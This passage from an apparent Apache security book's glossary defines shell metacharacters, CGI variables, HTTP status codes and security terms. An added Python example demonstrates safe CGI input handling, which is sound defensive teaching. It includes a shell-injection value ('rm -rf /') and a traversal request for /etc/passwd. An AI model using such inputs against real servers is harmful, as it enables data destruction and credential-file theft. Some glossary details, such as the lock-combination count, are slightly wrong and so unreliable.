should stay off. See the respective environment variable listings in this glossary, 
including AUTH_TYPE, CONTENT_LENGTH, CONTENT_TYPE, GATEWAY_INTERFACE, PATH_INFO, 
PATH_TRANSLATED, QUERY_STRING, REMOTE_ADDR, REMOTE_HOST, REMOTE_IDENT, REMOTE_USER, 
REQUEST_METHOD, SCRIPT_NAME, SERVER_NAME, SERVER_PORT, SERVER_PROTOCOL, and 
SERVER_SOFTWARE. 


* In a regular expression, * matches zero or more repetitions of the preceding 
element, so .* matches any run of characters, including none. In Apache configura- 
tion files the asterisk also appears as a shell-style wildcard in directives such as 
<Files>, <Directory>, and ServerAlias. For example, to map requests for 
http://www.yourhost.com/user/... to user directories in /home, use it in an 
AliasMatch directive, like this: AliasMatch ^/([^/]*)/?(.*) /home/$1/public_html/$2. 
Not every directive accepts wildcards; check the directive’s documentation before 
relying on one. 


? In shell globbing and in Apache’s wildcard contexts (<Files>, <Directory>), ? 
matches exactly one character of a file or directory name. In a regular expression 
(AliasMatch, <FilesMatch>, RewriteRule), ? instead makes the preceding element 
optional, matching zero or one occurrence of it. 


; Use ; to separate shell commands you want to execute sequentially 
(command1;command2). ; is also used in some programming languages (Perl, C, C++) 
to end a statement. For example: printf("This statement ends with a semi- 
colon\n");. Because ; ends one shell command and begins another, user input that 
reaches a shell unescaped (a CGI parameter passed to system(), for instance) lets a 
client append commands of its own. 


# Use the # metacharacter: a) to comment lines in Apache configuration files. 
Apache and Unix shells ignore the rest of a line after #, so a comment that wraps 
onto the next physical line needs another # there; b) in conjunction with the bang 
(!) symbol to announce the command interpreter that will run the specified script 
(#!/bin/sh, #!/usr/bin/perl); or c) to specify include directives in C programming 
language source files (#include <stdio.h>). 


! The ! metacharacter (called the “bang” symbol) in csh recalls recent commands 
by history numbers. For example, the command !143 recalls the 143rd command 
since login. In Apache configuration files, ! negates a test, as in 
<IfModule !mod_ssl.c> or a RewriteCond pattern. 


| Use | to pipe commands or force one command’s output to become the input of 
another. For example, suppose you want to look at logs of the last 10 root logins. Try 
this: last root | head -10. This will grab all recorded logins for root (last root). 
The resulting output then becomes input for head, which extracts from last’s output 
the most recent 10 logins (head -10). 


|| || represents a logical OR between two commands. The statement 
command1 || command2 tells the shell to execute command2 only if command1 fails 
(exits nonzero). 


& & tells the shell to run the preceding command in the background. Use this when 
the command you want to execute could lock up the shell and therefore hang other 
processes. Example: example-command &. 


&& && represents a logical AND between two commands. The statement 
command1 && command2 tells the shell to execute command2 only if command1 succeeds 
(exits zero). 


>& In csh, >& file redirects both STDOUT and STDERR to file (and overwrites that 
file). In sh and bash, write command > file 2>&1 instead. See standard output and 
standard error. 


>>& In csh, >>& file redirects and appends both STDOUT and STDERR to file. The sh 
and bash equivalent is command >> file 2>&1. See standard output and standard 
error. 


@ @is generally used in array assignment (@fruits=('apples', ‘oranges’, 
‘peaches')). Otherwise, @ appears in e-mail addresses (anon@mcp.com). 


< Use < to take a command’s input from a file (command < file). In various 
languages, < is also a comparison operator, the “less-than” symbol. 
> Use > to redirect output to a file. The command dir > dir-listing.txt will 
redirect your directory-listing request (dir) to a file (dir-listing.txt), over- 
writing it. Also, in various programming languages, > is a comparison operator, 
the “greater-than” symbol. 


>> Use >> to redirect and append data to a file. This differs from >. >> appends infor- 
mation, adding text to the end without overwriting it. 


= = is an assignment operator, not a comparison; confusing the two is a classic 
bug, since in C or Perl the test if ($var = 4) assigns 4 and is always true. In 
Perl, you could use = to store the output of the date program in a variable: 
$mydate=`/usr/bin/date`; and then have Apache print it on a document return. 


== == tests whether the two values on either side are equal, and belongs in condi- 
tional tests: if ($var==4) { print "$var equals 4\n"; }. In Perl, == compares 
numerically; use eq to compare strings. 


!=  != is a comparative operator and represents a NOT EQUAL state: 1 != 2 is true, 
but 1 != 1 is false. 


$HTTP_ACCEPT A CGI environment variable that stores the comma-separated list of 
MIME types the remote browser accepts. Like every HTTP_* variable, it is copied from 
a client-supplied header. See Chapter 12, “Hacking Secure Code: Apache at Server 
Side.” 


$HTTP_COOKIE A Web environment variable that stores the cookie sent by the 
remote client. See Chapter 12, “Hacking Secure Code: Apache at Server Side.” 


$HTTP_USER_AGENT A CGI environment variable that stores the name the remote 
client browser reports for itself. It is whatever the client chose to send, so it 
can’t be used to identify or trust a client. See Chapter 12, “Hacking Secure Code: 
Apache at Server Side.” 


$HOME $HOME, a shell environment variable, points to your home directory in Unix 
(typically, /home/hacker, where hacker is your username). To see your home direc- 
tory, type echo $HOME at a prompt. See environment variable. 


$LAST_MODIFIED A Web environment variable that stores the date and time of the 
last modification of the current document. See Chapter 12, “Hacking Secure Code: 
Apache at Server Side.” 


$LOGNAME $LOGNAME, a shell environment variable, stores your username. To see 
your current username/logname in Unix, type echo $LOGNAME at a shell prompt. See 
environment variable. 


$MAIL $MAIL, a shell environment variable, stores your mail directory’s location in 
Unix (typically /var/mail/hacker, where your username is hacker). To see your 
current mail directory, type echo $MAIL at a shell prompt. See environment vari- 
able. 
$PATH $PATH, a shell environment variable, stores your path (the list of directories 
the shell searches for commands) in Unix and Windows. A typical Unix path might 
look like this: /bin:/usr/bin:/usr/local/bin:/usr/man:/usr/X11R6/bin. Colons 
separate directories (Windows uses semicolons). To see your current path, type 
echo $PATH at a shell prompt. See environment variable. 


$PATH_INFO A CGI environment variable that stores the extra path information that 
followed the script name in the request URL. It is a virtual path (relative to the 
server’s document space), not a filesystem path; see PATH_TRANSLATED for the mapped 
version, and validate it before using it to open files. See Chapter 12, “Hacking 
Secure Code: Apache at Server Side.” 


$PATH_TRANSLATED A Web environment variable that stores the PATH_INFO variable 
translated from virtual to local (physical) disk location. See Chapter 12, “Hacking 
Secure Code: Apache at Server Side.” 


$QUERY_STRING A Web environment variable that stores the raw query string sent 
from the remote browser. See Chapter 12, “Hacking Secure Code: Apache at Server 
Side.” 


$QUERY_STRING_UNESCAPED A variable that stores the query string after URL decoding, 
with every shell-special character escaped by a backslash. mod_include sets it for 
#exec cmd; that escaping is all that stands between a client’s query string and 
your shell, so don’t strip it. See Chapter 12, “Hacking Secure Code: Apache at 
Server Side.” 


$REMOTE_ADDR A Web environment variable that stores the IP address of the remote 
client browser. See Chapter 12, “Hacking Secure Code: Apache at Server Side.” 


$REMOTE_HOST A CGI environment variable that stores the host name of the remote 
client. Apache sets it only when HostnameLookups is On and the reverse lookup 
succeeds; otherwise use REMOTE_ADDR. See Chapter 12, “Hacking Secure Code: Apache at 
Server Side.” 


$REMOTE_IDENT A Web environment variable that stores the remote user name if 
supporting RFC931 identification. See Chapter 12, “Hacking Secure Code: Apache at 
Server Side.” 


$REQUEST_METHOD A Web environment variable that stores the method by which 
the current document was requested. See Chapter 12, “Hacking Secure Code: Apache 
at Server Side.” 


$SHELL A shell environment variable that stores your default shell. To see your 
default shell, type echo $SHELL at a shell prompt. See environment variable. 


$SCRIPT_NAME A Web environment variable that stores the virtual path of the script 
being executed. See Chapter 12, “Hacking Secure Code: Apache at Server Side.” 


$SERVER_NAME A Web environment variable that stores the local computer name of 
the HTTP server. See Chapter 12, “Hacking Secure Code: Apache at Server Side.” 


$SERVER_PORT A Web environment variable that stores the IP port the HTTP server 
is answering on. See Chapter 12, “Hacking Secure Code: Apache at Server Side.” 
$SERVER_PROTOCOL A Web environment variable that stores the name/version of 
HTTP served on this HTTP server. See Chapter 12, “Hacking Secure Code: Apache at 
Server Side.” 


$SERVER_SOFTWARE A Web environment variable that stores the name of the HTTP 
server software. See Chapter 12, “Hacking Secure Code: Apache at Server Side.” 


$REMOTE_USER A Web environment variable that stores the user name used to vali- 
date authentication from the remote client. Great for use in password-protected sites. 
See Chapter 12, “Hacking Secure Code: Apache at Server Side.” 
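The CGI variables above are the boundary between Apache and a script, and most of them (QUERY_STRING, PATH_INFO, HTTP_USER_AGENT, HTTP_COOKIE, HTTP_ACCEPT) are chosen by the client. The Python below is an added example, not code from the book or from Apache: a small CGI-style handler that reads those variables the safe way. PATH_INFO is resolved against a document root and refused if it escapes it, QUERY_STRING is parsed rather than handed to a shell, and a lookup that the vulnerable version would run through the shell (where the ; and | metacharacters described earlier in this glossary do their damage) is done with a list-form subprocess call so those characters are just bytes in the pattern. The environment dictionary, the document root and its file are constructed for the example; grep is assumed to be on the PATH.

```python
"""Safe use of the CGI environment Apache hands a script (example code, not
from the book or from Apache). The environment and document root below are
constructed, so the code runs without a web server."""
import os
import subprocess
import tempfile
import urllib.parse


def safe_path(path_info, docroot):
    """Map PATH_INFO (a virtual path) to a file under docroot. Returns the
    absolute path, or None if the path escapes docroot by any route: ../,
    URL-encoded ../, or an embedded NUL. Symlinks are not resolved here;
    Apache's own FollowSymLinks handling covers those."""
    decoded = urllib.parse.unquote(path_info or "")
    if "\x00" in decoded:
        return None
    root = os.path.abspath(docroot)
    full = os.path.abspath(os.path.join(root, decoded.lstrip("/")))
    if full != root and not full.startswith(root + os.sep):
        return None
    return full


def parse_query(query_string, max_len=1024):
    """Parse QUERY_STRING into {name: first value}. Refuse oversize strings
    outright instead of letting them reach whatever consumes the values."""
    if len(query_string or "") > max_len:
        raise ValueError("query string too long")
    pairs = urllib.parse.parse_qs(query_string or "", keep_blank_values=True)
    return {k: v[0] for k, v in pairs.items()}


def grep_command_vulnerable(pattern, filename):
    """The classic mistake: the client's pattern is spliced into a shell command
    line, so  q=x';rm -rf /;'  runs a second command. Returned as a string and
    never executed, so the shape of the bug is visible."""
    return "grep -c -- '%s' %s" % (pattern, filename)


def grep_command_safe(pattern, filename):
    """List form: each element is one argv entry and no shell is involved, so
    ; | & and quotes are just bytes in the pattern. The -- keeps a pattern that
    starts with - from being read as an option."""
    return ["grep", "-c", "--", pattern, filename]


def handle_request(environ, docroot):
    """Serve one request described by CGI variables: count lines in the file
    named by PATH_INFO that match the q= query parameter. Returns (status, body)."""
    if environ.get("REQUEST_METHOD") != "GET":
        return 405, "method not allowed"
    target = safe_path(environ.get("PATH_INFO", ""), docroot)
    if target is None:
        return 403, "forbidden"
    if not os.path.isfile(target):
        return 404, "not found"
    try:
        params = parse_query(environ.get("QUERY_STRING", ""))
    except ValueError:
        return 414, "request URI too large"
    pattern = params.get("q", "")
    if not pattern:
        return 400, "missing q"
    proc = subprocess.run(grep_command_safe(pattern, target),
                          capture_output=True, text=True)
    if proc.returncode > 1:        # grep exits 1 for "no match", >1 for errors
        return 500, "internal error"
    # HTTP_USER_AGENT is whatever the client sent: record it, never act on it.
    agent = environ.get("HTTP_USER_AGENT", "-")
    return 200, "%s matching lines (ua=%r)" % (proc.stdout.strip(), agent)


def demo(docroot=None):
    """Build a tiny document root and run three constructed requests through
    handle_request: a normal lookup, a traversal attempt, a shell-injection attempt."""
    docroot = docroot or tempfile.mkdtemp(prefix="cgi-demo-")
    os.makedirs(os.path.join(docroot, "docs"), exist_ok=True)
    with open(os.path.join(docroot, "docs", "notes.txt"), "w") as f:
        f.write("alpha\nbeta\nalpha beta\n")
    base = {"REQUEST_METHOD": "GET", "HTTP_USER_AGENT": "Mozilla/4.0 (constructed)"}
    requests = [
        dict(base, PATH_INFO="/docs/notes.txt", QUERY_STRING="q=alpha"),
        dict(base, PATH_INFO="/docs/../../etc/passwd", QUERY_STRING="q=root"),
        dict(base, PATH_INFO="/docs/notes.txt", QUERY_STRING="q=x%3Brm+-rf+/"),
    ]
    return [handle_request(env, docroot) for env in requests]


if __name__ == "__main__":
    for status, body in demo():
        print(status, body)
```

The first request returns 200 with two matching lines, the traversal attempt gets 403 before any file is touched, and the injection attempt is just a pattern nobody matches (200, zero lines) instead of a second command. Apache itself strips ../ from the URI before it sets PATH_INFO, but a script should not rely on that: encoded forms and other front ends exist.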


$TERM A shell environment variable that stores your current terminal emulation. To 
see your current terminal emulation, type echo $TERM at a shell prompt. See envi- 
ronment variable. 


$TZ A shell environment variable that stores your default timezone. To see your 
current timezone, type echo $TZ at a shell prompt. See environment variable. 


200 (status code) The 200 code indicates that the request succeeded and Apache 
served the requested resource without error. See Chapter 9, “Spotting Crackers: 
Apache Logging Facilities.” 


201 (status code) The 201 code indicates that Apache satisfied the request by 
creating a new resource (as after a PUT). See Chapter 9, “Spotting Crackers: Apache 
Logging Facilities.” 


202 (status code) The 202 code indicates that the client’s command was accepted 
by the server for processing. See Chapter 9, “Spotting Crackers: Apache Logging 
Facilities.” 


203 (status code) The 203 code indicates that the answer was non-authoritative. 
See Chapter 9, “Spotting Crackers: Apache Logging Facilities.” 


204 (status code) The 204 code indicates that the client’s request was processed, 
but the server couldn’t return any data. See Chapter 9, “Spotting Crackers: Apache 
Logging Facilities.” 


300 (status code) The 300 code indicates that the requested resource corresponds 
to any one of a set of representations, each with its own location, and that the 
response carries agent-driven negotiation information so the user (or user agent) 
can select a preferred representation and redirect its request there (multiple 
choices). See Chapter 9, “Spotting Crackers: Apache Logging Facilities.” 


301 (status code) The 301 code indicates that the requested resource has moved 
permanently to the URL given in the Location header; clients and proxies may update 
their links. See Chapter 9, “Spotting Crackers: Apache Logging Facilities.” 


302 (status code) The 302 code indicates that the requested resource resides 
temporarily at a different URL, given in the Location header; the client should keep 
using the original URL for future requests. See Chapter 9, “Spotting Crackers: 
Apache Logging Facilities.” 

303 (status code) The 303 code (See Other) indicates that the response to the 
request can be found at another URL, which the client should retrieve with GET; it 
is typically sent after a POST. See Chapter 9, “Spotting Crackers: Apache Logging 
Facilities.” 


304 (status code) The 304 code indicates that the client performed a conditional 
GET request and access is allowed, but the document has not been modified. 


305 (status code) The 305 code indicates that the client must access the 
requested resource through the proxy given by the Location field. The Location field 
gives the URI of the proxy. The recipient is expected to repeat this single request via 
the proxy. 


307 (status code) The 307 code indicates that Apache had to forward the request 
to another location. 


400 (status code) The 400 code indicates that the client made a malformed 
request which could therefore not be processed. See Chapter 9, “Spotting Crackers: 
Apache Logging Facilities.” 

401 (status code) The 401 code indicates that the client tried to access data that 
it is not authorized to have. See Chapter 9, “Spotting Crackers: Apache Logging 
Facilities.” 


402 (status code) The 402 code indicates that a payment scheme has been nego- 
tiated. See Chapter 9, “Spotting Crackers: Apache Logging Facilities.” 


403 (status code) The 403 code indicates that access is forbidden altogether. See 
Chapter 9, “Spotting Crackers: Apache Logging Facilities.” 


404 (status code) The 404 code (the most often-seen code) indicates that the 
document was not found. See Chapter 9, “Spotting Crackers: Apache Logging 
Facilities.” 


405 (status code) The 405 code indicates that the client’s request method is not 
allowed. 


406 (status code) The 406 code indicates that the client’s request is 
unacceptable. 


407 (status code) The 407 code indicates that proxy authentication is required. 
408 (status code) The 408 code indicates that the request timed out. 


409 (status code) The 409 code indicates that Apache, while attempting to 
satisfy the client request, encountered a conflict. 
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410 (status code) The 410 code indicates that the requested resource is gone. 


411 (status code) The 411 code indicates that a request length is required and 
Apache did not receive it as expected. 


412 (status code) The 412 code indicates that some precondition Apache 
expected failed. 


413 (status code) The 413 code indicates that the client’s request entity was too 
long to process. 


414 (status code) The 414 code indicates that the client’s request URI was too 
long. 


415 (status code) The 415 code indicates that the client sent a request that 
contained (or asked for) an unsupported media type. 


500 (status code) The 500 code indicates that an internal server error occurred 
from which the server could not recover. This is a common error when a client calls 
a flawed CGI script. See Chapter 9, “Spotting Crackers: Apache Logging Facilities.” 


501 (status code) The 501 code indicates that the client requested an action that 
the server cannot perform or does not support. See Chapter 9, “Spotting Crackers: 
Apache Logging Facilities.” 


502 (status code) The 502 code indicates that the server received a bad response 
from an upstream or support server (a bad gateway). See Chapter 9, “Spotting 
Crackers: Apache Logging Facilities.” 


503 (status code) The 503 code indicates that the Apache service is unavailable 
(the Web server is busy and cannot process requests right now). 


504 (status code) The 504 code indicates that a gateway Apache was waiting for 
timed out. 


505 (status code) The 505 code indicates that the client’s requested HTTP version 
is unsupported. 


.aif This file extension denotes an Apple or SGI (IRIX) sound file.

.avi This file extension denotes a Video for Windows file (containing either real video or animation).

.awk This file extension denotes an awk program (Example: count.awk). See awk.

.bck This file extension denotes a backup file.

.c This file extension denotes a C programming language source file (Example: menu.c). See C.

.cc This file extension (rarely used in Linux) denotes a C++ programming language source file (Example: menu.cc). See C++.

.csh This file extension denotes a C shell program file (Example: cut.csh). See C shell.

.cgi This file extension denotes a CGI program source file (Example: Webcounter.cgi). Such files probably contain Perl programs, which are also sometimes named with a .pl extension. See Perl.

.CGM This file extension denotes a Computer Graphics Metafile (image) file.

.conf This file extension denotes a configuration file (Example: access.conf).

.cpp This file extension denotes C code (for preprocessing).

.dat This file extension denotes a data file that could originate from almost any platform.

.db This file extension denotes a database file (Example: users.db).

.doc This file extension denotes either a plain text file or a Microsoft Word document.

.gz This file extension denotes a compressed file (Example: package.gz).

.h This file extension denotes a C programming language header file.

.htaccess The htpasswd access file. See htpasswd and Chapter 11, “Apache and Authentication: Who Goes There?”

.htpasswd The htpasswd password database (for password-protecting Web sites). See htpasswd and Chapter 11, “Apache and Authentication: Who Goes There?”

.o This file extension denotes a compiled C programming language object file.

.pl This file extension denotes a Perl script file. See Perl.

.ps This file extension denotes a PostScript file. See PostScript.

.py This file extension denotes a Python program file. See Python.

.S This file extension denotes an assembler language file.

.sh This file extension denotes a shell program file.

.shtml This file extension denotes that the specified file has within it server-side include (SSI) directives. See Chapter 12, “Hacking Secure Code: Apache at Server Side.”

.tar This file extension denotes a tar archive file. See tar.

.tcl This file extension denotes a Tcl program. See Tcl.

.tgz This file extension denotes a compressed file (Example: package.tgz).

.uue This file extension denotes uuencoded text. See uuencode.

.uud This file extension denotes uudecoded text. See uuencode.

.XBM This file extension denotes an X Window System bitmap (image).

.Z This file extension denotes a compressed file (Example: package.tgz).

3DES 3DES is another way of referring to TripleDES, where DES runs through three levels of encryption. See DES.

AAA Authentication, Authorization, and Accounting. See Chapter 9, “Spotting Crackers: Apache Logging Facilities.”

AAA server A server designated specifically to handle authentication, authorization, and accounting. See Chapter 9, “Spotting Crackers: Apache Logging Facilities.”

absolute path The absolute path is the specified resource’s full path, beginning at root. In reference to URLs in scripts, an absolute path is the whole shebang, either on the inside (/var/http/myhost.com/index.html) or the outside (http://www.myhost.com/index.html), as opposed to /index.html.

access control Means to selectively grant or deny users access to system resources.

access control list (ACL) A list wherein you specify what system resources you’re allowing users to access (and which users can obtain such access). Sometimes called simply an access list. Access lists can be complicated (listing where, when, and how users can access resources) or rudimentary (a list of users and their corresponding passwords).

access time Access time is the time during which a user can access a particular object or resource. For example, an administrator might restrict a user’s login capability to weekdays between the hours of 8:00 a.m. and 5:00 p.m. This is the user’s access time.

account policies In many operating systems, you can establish user logon and password policies. For example, how long is a user’s password valid? Should she be allowed to change it? These policies are account policies.

accreditation A statement from some authority that your Web site and business practices are secure or lend to security.

add-on security controls Security controls not included in a default installation, added after the fact, usually to legacy hardware or software.

address A hostname or URL on the World Wide Web.

address space Total memory allocated for any given resource (a server, hosts, or IP addresses).

alias Aliases are short nicknames for either commands or directories.

applet A small Java program that runs in Web browser environments that contain a locally installed Java Virtual Machine. Applets add graphics, animation, and dynamic text to otherwise boring Web pages. Applets can have serious security implications, however. In sensitive environments, disable browser applet capability and/or screen content through your firewall or packet filters.

APLOG_ALERT Web server constant in http_log.h (for logging alerts). See Appendix D, “Apache API Quick Reference.”

APLOG_CRIT Web server constant in http_log.h (for logging critical events). See Appendix D, “Apache API Quick Reference.”

APLOG_DEBUG Web server constant in http_log.h (for debug logging). See Appendix D, “Apache API Quick Reference.”

APLOG_EMERG Web server constant in http_log.h (for emergency logging). See Appendix D, “Apache API Quick Reference.”

APLOG_ERR Web server constant in http_log.h (for error logging). See Appendix D, “Apache API Quick Reference.”

APLOG_INFO Web server constant in http_log.h (for informational logging). See Appendix D, “Apache API Quick Reference.”

APLOG_LEVELMASK Web server constant in http_log.h (for logging by level). See Appendix D, “Apache API Quick Reference.”

APLOG_MARK Web server constant in http_log.h (for error logging). See Appendix D, “Apache API Quick Reference.”

APLOG_NOERRNO Web server constant in http_log.h (for error logging). See Appendix D, “Apache API Quick Reference.”

APLOG_NOTICE Web server constant in http_log.h (for logging notices). See Appendix D, “Apache API Quick Reference.”

APLOG_WARNING Web server constant in http_log.h (for logging warnings). See Appendix D, “Apache API Quick Reference.”

APLOG_WIN32ERROR Web server constant in http_log.h (for logging service control dispatcher errors). See Appendix D, “Apache API Quick Reference.”

array A list that stores values that are part of a subset. For example, you could create an array called @fruits. Inside of @fruits, you could store apples, oranges, pears, and so on.

asymmetric cipher Cipher that employs a public-key/private-key cryptosystem. In such systems, A encrypts a message to B’s public key. From that point on, the message can only be decrypted using B’s private key.

attack An intruder’s attempt to access or disable your Web server.

attribute The state of a given file or directory and whether it’s readable, hidden, system, or other. Also sometimes refers to the state of objects in JavaScript and HTML.

audit Loosely defined, a systematic analysis of your system or business practices. Its purpose in this context is to ascertain if you maintain the best practices. Less loosely defined, a proactive test of your security controls and your server’s ability to survive, record, track, analyze, and report attacks. See Chapter 9, “Spotting Crackers: Apache Logging Facilities.”

audit policy Your audit policy establishes what security events you log to file. For example, you can log user logons, policy changes, reboots, and so on. These events can be significant in a security context. See Chapter 9, “Spotting Crackers: Apache Logging Facilities.”

audit trail Data used to record, track, analyze, and report network activity and the path you take to derive that data from its source. Raw access logs from your Web server are good examples. To polish these, you might use a script that mines the data and formats it cleanly. From there, you can isolate events (for example, requests for a particular file from a particular address) and from this, you can ascertain facts about an attack. See Chapter 9, “Spotting Crackers: Apache Logging Facilities.”

AllowOverride An Apache directive that lets you specify in what directories users or processes can override httpd.conf defaults (and which directives these can override).

AUTH_TYPE Environment variable that stores the authentication method used.

AuthDBMGroupFile An Apache directive that stores the location of the DBM file that contains the list of user groups for user authentication. See Appendix A, “Apache Security-Related Modules and Directives,” and Chapter 10, “Apache Network Access Control.”

AuthDBMUserFile An Apache directive that stores the location of the DBM file that contains the list of users for user authentication. See Appendix A, “Apache Security-Related Modules and Directives,” and Chapter 10, “Apache Network Access Control.”

AuthGroupFile An Apache directive that stores the location of the (text) file that contains the list of user groups for user authentication. See Appendix A, “Apache Security-Related Modules and Directives,” and Chapter 10, “Apache Network Access Control.”

AuthName An Apache directive that sets the authorization realm’s name for directories. See Appendix A, “Apache Security-Related Modules and Directives,” and Chapter 10, “Apache Network Access Control.”

AuthType An Apache directive that sets the user authentication type for the specified directory. See Appendix A, “Apache Security-Related Modules and Directives,” and Chapter 10, “Apache Network Access Control.”

AuthUserFile An Apache directive that sets the name and location of the (text) file containing the list of users and passwords for user authentication. See Appendix A, “Apache Security-Related Modules and Directives,” and Chapter 10, “Apache Network Access Control.”

authenticate To verify a user’s, host’s, or session’s identity or integrity.

authentication The process of authenticating a user, host, session, or process.

authenticator Any means by which to authenticate a user, node, or process.

authorization A user’s right to access objects or resources.

awk (gawk) A text-processing and scanning language. Also called gawk (gawk is a free, GNU awk variant).

B_ASCII2EBCDIC An Apache Web server constant in buff.h. See Appendix D, “Apache API Quick Reference.”

B_SFIO An Apache Web server constant, available at compile-time, which provides sfwrite and sfread support. See Appendix D, “Apache API Quick Reference.”

back door A hidden program left behind by an intruder that gives him future access to his victim host.

background The “place” where you send low-priority processes. Processes can either run in the foreground (in which case, their output is printed directly to your terminal in real-time), or the background. When in the background, processes don’t interrupt your terminal session until they need more data from you or need to notify you that they’ve finished. This is a historical holdover to when you could access only one virtual terminal at a time. To send a process into the background, issue the command plus the ampersand symbol & (Example: command &). This sends the program command into the background.

backup To preserve a file system or files, usually for disaster recovery. Generally, you back up to tape, floppy disk, or other portable media that you can store safely for later use.

bash The Bourne-Again Shell, a sh-compatible command interpreter. Compare with csh, ksh, and tcsh.

biometric access controls Systems that authenticate users by biological characteristics, such as their face, fingerprints, or retinal pattern.

biometrics See biometric access controls.

Blowfish A 64-bit encryption scheme developed by Bruce Schneier. Blowfish is often used for high-volume, high-speed encryption. (Blowfish is reportedly faster than both DES and IDEA.) To learn more, go to http://www.counterpane.com/blowfish.html.

broadcast/broadcasting Any network message sent to all network interfaces, or the practice of sending such a message.

brute force attack A brute force attack is primitive. In it, every possible combination is tried until the attacker lands on the correct one. To appreciate this process, think of an attaché case with a combination lock. Such locks usually have three wheels, and each wheel runs from numbers 0 to 9. To try all possible combinations on such a lock would take 999 tries, or 1,998 total tries for both the right and left locks. However, in reality, you would likely open the case long before exhausting your 1,998 possibilities. You could increase your chances dramatically by trying more likely combinations first, like 007, 666, and 777, as well as matching combinations that span both locks. (For example, where the left three wheels are 2,4,6 and the three right wheels are 8,1,0, which spell out 2-4-6-8-10.) In such a scheme, your search would start at 000, progress to 001, and so on.

bug A bug is a hole, weakness, or flaw in a computer program, typically related to programmer error or sloppiness. See vulnerability.

buildmark.c Apache source file that returns the date and time of the server’s build. Includes ap_config.h and httpd.h.

C The C programming language.

C++ Object-oriented programming language that resembles C but is, some say, more powerful. C++ relies heavily on inheritable classes.

C shell The C shell (csh), a Unix-based language interpreter (shell) that supports C programming language-like syntax and language.

CA See Certificate Authority.

C4I Command, Control, Communications, Computers, and Intelligence—an information warfare term.

case sensitivity A condition where the system differentiates between upper and lower case letters.

Cast-128 An encryption algorithm that uses large keys, and can be incorporated into cryptographic applications. Learn more by obtaining RFC 2144.

CERT The Computer Emergency Response Team. CERT assists victims of cracker attacks and provides valuable research to the Internet community at large. Learn more here: http://www.cert.org.

Certificate Authority Trusted third party that issues security certificates and verifies their authenticity. Probably the most renowned commercial certificate authority is VeriSign. VeriSign issues certificates for Microsoft-compatible ActiveX components, among other things.

certification Either the end result of a successful security evaluation of a product or system, or an academic honor bestowed on one who successfully completes courses in networking (such as MCSE/A+ certification).

chaos Mathematicians sometimes refer to chaos as the great disorder, formless matter in infinite space, or something so disorderly or random that no pattern exists within it. Recent studies suggest that true chaos may be elusive. Research shows that even in chaos, order can exist. That is, in chaos, discernible, observable patterns do sometimes arise when one examines the specified system over long time periods. When these patterns repeat themselves in even a semi-orderly fashion, what initially seemed to be a true chaotic system loses its status as such. Studies of chaos are common to the cryptography field, along with research in which scientists search for “true” randomness.

checksum A numeric value composed of the sum (or a finite number) of a file’s bits. Checksums can verify file integrity. For example, many network programs use checksums to verify that transmitted data arrives at its destination intact. Typically, network applications generate the checksum at the data’s origin and transmit this value to the receiving application. Receiving applications then recalculate the data’s checksum. If there’s a match, everything went smoothly. If not, the data was damaged in transit, and the applications attempt a resend.

chroot A restricted environment in which processes run “in prison,” so to speak; these cannot access the filesystem at large (outside of the environment you specify).

client Software that interacts with a specific server application. WWW browsers (Netscape Communicator, Internet Explorer, Opera) are WWW clients. Developers design them specifically to interact with Web servers.

client-server model A networking model wherein one server can distribute data to many clients. The relationship your Web server has to Web clients or browsers is a client-server relationship (Apache being the server, browsers being the clients). In this model, the server generally performs computational services and returns results to the client. Most network applications and protocols are client-server oriented.

cmd_how An Apache Web server constant that defines how Apache handles argument processing for instances of command_rec. See Appendix D, “Apache API Quick Reference.”

Common Gateway Interface (CGI) A standard that specifies programming techniques to pass data from Web servers to Web clients. CGI is language neutral. CGI programs can therefore operate in Perl, C, C++, Python, Visual Basic, BASIC, and shell languages. CGI programs can raise security issues. See Chapter 12, “Hacking Secure Code: Apache at Server Side.”

confidentiality The principle or policy by which data is sensitive or privileged, and therefore not for general consumption or viewing.

config.c Apache server source file that contains functions that handle bookkeeping for Apache configuration (loaded modules, config vectors, and so on). Includes apr.h, apr_strings.h, apr_portable.h, apr_file_io.h, apr_want.h, ap_config.h, httpd.h, http_config.h, http_protocol.h, http_core.h, http_log.h, http_request.h, http_main.h, http_vhost.h, util_cfgtree.h, and mpm.h.

connection.c Apache server source file that contains functions that handle graceful connection closing with clients from disparate platforms. Includes apr.h, apr_strings.h, ap_config.h, httpd.h, http_connection.h, http_request.h, http_protocol.h, ap_mpm.h, mpm_default.h, http_config.h, http_vhost.h, scoreboard.h, http_log.h, and util_filter.h.

CONTENT_LENGTH Environment variable that stores the length of input stream data.

CONTENT_TYPE Environment variable that stores the Internet media type of the input stream.

contingency plan Procedure or procedures you undertake when an emergency or disaster arises. Example: What if your Web server goes down? What if this occurs on a weekend? Can you get someone to fix it? You must have a contingency plan to handle unforeseen circumstances.

core.c Apache server source file that contains server core functionalities, including options and commands that control other modules, NCSA backward compatibility, URL handling, and so on. Includes apr.h, apr_strings.h, apr_lib.h, apr_fnmatch.h, apr_hash.h, apr_thread_proc.h, apr_want.h, ap_config.h, httpd.h, http_config.h, http_core.h, http_protocol.h, http_request.h, http_vhost.h, http_main.h, http_log.h, rfc1413.h, util_md5.h, http_connection.h, apr_buckets.h, util_filter.h, util_ebcdic.h, mpm.h, mpm_common.h, scoreboard.h, mod_core.h, and mod_proxy.h.

COTS Commercial-Off-The-Shelf.

countermeasure Any action or technique that minimizes or eliminates a threat.

CR An Apache Web server constant in httpd.h that lets you define how Apache handles carriage returns. See Appendix D, “Apache API Quick Reference.”

CRLF An Apache Web server constant in httpd.h that defines how Apache handles a carriage return plus linefeed (and it does it as a string). See Appendix D, “Apache API Quick Reference.”

crack Loosely defined, any software, procedure, or technique that circumvents security. Less loosely defined, a crack is a Unix-based password cracker called Crack. Also: to breach system security or commercial software registration schemes.

cracker Someone who unlawfully and with malice breaches system security.

crash When a system fatally fails and requires reboot.

CRC CRC is Cyclic Redundancy Check, an operation to verify data integrity.

cryptography The science of secret writings. In cryptography, you scramble your writings so they remain unreadable to unauthorized personnel. Theoretically, only authorized users can unravel an encrypted message. However, your encrypted message’s ability to evade unauthorized eyes depends on the type and strength of encryption you use.

C shell A Unix command interpreter with C-like syntax.

DAC (Discretionary Access Control) DAC provides the means for a central authority to either permit or deny access to all users, and to do so incisively based on time, date, file, directory, or host.

data-driven attack An attack that deploys hidden or encapsulated data designed to flow through a firewall undetected. Java and JavaScript can be used for such attacks, although most firewalls and VPNs can now screen content.

Data Encryption Standard (DES) IBM encryption standard originating in 1974 and published in 1977. DES was the U.S. government standard for encrypting nonclassified data.

